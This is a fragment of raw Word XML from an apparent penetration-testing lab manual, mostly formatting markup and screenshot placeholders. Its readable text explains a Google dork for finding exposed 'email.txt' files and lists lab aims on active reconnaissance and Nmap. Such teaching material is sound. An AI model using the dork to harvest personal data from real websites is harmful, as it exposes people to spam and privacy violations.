                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>inurl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="0070C0"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>:"email.txt"" is used to search for text files with "email" in the URL. This search query is searching for all text files with the extension ".txt" that contain the word "email" in the URL. This can be useful for finding email addresses or other information stored in text files on a website.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4897F1E6" w14:textId="77777777" w:rsidR="00FD320D" w:rsidRPr="001C411D" w:rsidRDefault="00FD320D" w:rsidP="00FD320D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3EB6CC2B" w14:textId="77777777" w:rsidR="00DE3513" w:rsidRPr="001C411D" w:rsidRDefault="00DE3513" w:rsidP="00A90352">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3173CD6C" w14:textId="09789D8F" w:rsidR="00FA25CD" w:rsidRPr="001C411D" w:rsidRDefault="00FA25CD" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73411BBC" w14:textId="77777777" w:rsidR="00476F60" w:rsidRPr="001C411D" w:rsidRDefault="00476F60" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C59ECAA" w14:textId="77777777" w:rsidR="00736145" w:rsidRDefault="00736145">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C872B" w14:textId="681E456A" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764" w:rsidP="00DF4764">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09FA5BC9" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DF4764" w:rsidP="00DF4764">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649FD55B" w14:textId="77777777" w:rsidR="003555DF" w:rsidRPr="001C411D" w:rsidRDefault="003555DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62C8EBC2" w14:textId="0224B469"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5066A040" wp14:editId="1BA13367">
            <wp:extent cx="5943600" cy="318452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48E7222" w14:textId="6A05D94F"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2AF8524B" wp14:editId="0E04E254">
            <wp:extent cx="5943600" cy="318452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3677A9D" w14:textId="636EDC20" w:rsidR="00037D14" w:rsidRPr="001C411D" w:rsidRDefault="00037D14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="460294B4" wp14:editId="1633882D">
            <wp:extent cx="5943600" cy="318452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449E53CF" w14:textId="39099433"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2B284BD3" wp14:editId="78EFBE61">
            <wp:extent cx="5943600" cy="31845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1095A4D" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDA1A3B" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="402D369B" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2194A4D0" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E83847F" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767EDA2B" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B84A23F" w14:textId="376A4EBF"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2FC51090" wp14:editId="13015117">
            <wp:extent cx="5943600" cy="31845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2A514A31" w14:textId="5DF5A06D"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0389A561" wp14:editId="1BF4F0BD">
            <wp:extent cx="5943600" cy="318452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0B9804A8" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61F7661D" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B155281" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0B1540" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="403B11CA" w14:textId="7C573B92"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56A81714" wp14:editId="1FABC3BC">
            <wp:extent cx="5943600" cy="318452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35264E8C" w14:textId="4071BBD3"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730D7577" wp14:editId="394EE193">
            <wp:extent cx="5943600" cy="318452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19A0145F" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D3A4D3D" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B1F700" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1A46DF" w14:textId="77777777"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07F66957" wp14:editId="25E02EC2">
            <wp:extent cx="5943600" cy="31845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1C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365D8CAC" w14:textId="4223E525"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1B3F111B" wp14:editId="02D86193">
            <wp:extent cx="5943600" cy="318452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1C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CFD184" w14:textId="77777777" w:rsidR="00037D14" w:rsidRPr="001C411D" w:rsidRDefault="00037D14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62719E63" wp14:editId="3581A034">
            <wp:extent cx="5943600" cy="318452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1C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3083A153" w14:textId="77777777"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76AA1B59" wp14:editId="40F2E79E">
            <wp:extent cx="5943600" cy="3184525"/>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1C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B16F81" w14:textId="77777777" w:rsidR="00037D14" w:rsidRPr="001C411D" w:rsidRDefault="00037D14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC5DFFB" w14:textId="77777777" w:rsidR="00037D14" w:rsidRPr="001C411D" w:rsidRDefault="00037D14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21F2F0FC" wp14:editId="6F1330BB">
            <wp:extent cx="5943600" cy="318452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3D814A37" w14:textId="1D5BD2F6" w:rsidR="00037D14"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20AD4BFC" wp14:editId="3A7312A1">
            <wp:extent cx="5943600" cy="318452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1C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="055F563E" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DEA7BE0" w14:textId="207E7F0C" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00037D14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D36551C" wp14:editId="1309510D">
            <wp:extent cx="5943600" cy="3184525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Picture 17" descr="A screen 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menu&#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79F0E99" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603F0525" w14:textId="77777777" w:rsidR="00037D14" w:rsidRPr="001C411D" w:rsidRDefault="00037D14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFFF5B2" w14:textId="67772122"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36145" w:rsidRPr="001C411D" w14:paraId="43C27068" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FDE2156" w14:textId="77777777"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58E4273F" w14:textId="77777777" w:rsidR="00736145" w:rsidRPr="001C411D" w:rsidRDefault="00736145" w:rsidP="00736145">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00736145" w:rsidRPr="001C411D" w14:paraId="6B1699D6" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77B1A818" w14:textId="77777777"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7CABEFAC" w14:textId="77777777" w:rsidR="00736145" w:rsidRPr="001C411D" w:rsidRDefault="00736145" w:rsidP="00736145">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00736145" w:rsidRPr="001C411D" w14:paraId="76A1A634" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="758AA856" w14:textId="77777777"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10E9DBCB" w14:textId="77777777" w:rsidR="00736145" w:rsidRPr="001C411D" w:rsidRDefault="00736145" w:rsidP="00736145">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00736145" w:rsidRPr="001C411D" w14:paraId="5B8A84E3" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A7F2A67" w14:textId="49CFD52A"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736145" w:rsidRPr="001C411D" w14:paraId="20500B38" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="453177EF" w14:textId="77777777"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23BCE2A8" w14:textId="77777777" w:rsidR="00736145" w:rsidRPr="001C411D" w:rsidRDefault="00736145" w:rsidP="00736145">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00736145" w:rsidRPr="001C411D" w14:paraId="36C5BC1E" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D2F733" w14:textId="77777777" w:rsidR="00736145" w:rsidRPr="001C411D" w:rsidRDefault="00736145" w:rsidP="0073614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64128D5B" w14:textId="77777777" w:rsidR="00736145" w:rsidRPr="001C411D" w:rsidRDefault="00736145" w:rsidP="00736145">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5ACE9F7E" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00A90352">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90352" w:rsidRPr="001C411D" w14:paraId="5924F886" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43C98163"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247579ED" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="49D32D19" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">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Second phase of penetration testing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4575F42B" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A90352" w:rsidRPr="001C411D" w14:paraId="3887A685" w14:textId="77777777" w:rsidTr="00CF3C5F">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7A5F23E3"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2EF0BB4B" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF3C5F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="644E0196" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A9035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understand difference between active and passive reconnaissance.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F9FD36D" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A9035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gather the information of the target machine by interacting with it.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="517EC0B5" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A9035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understand Nmap Tool</w:t>
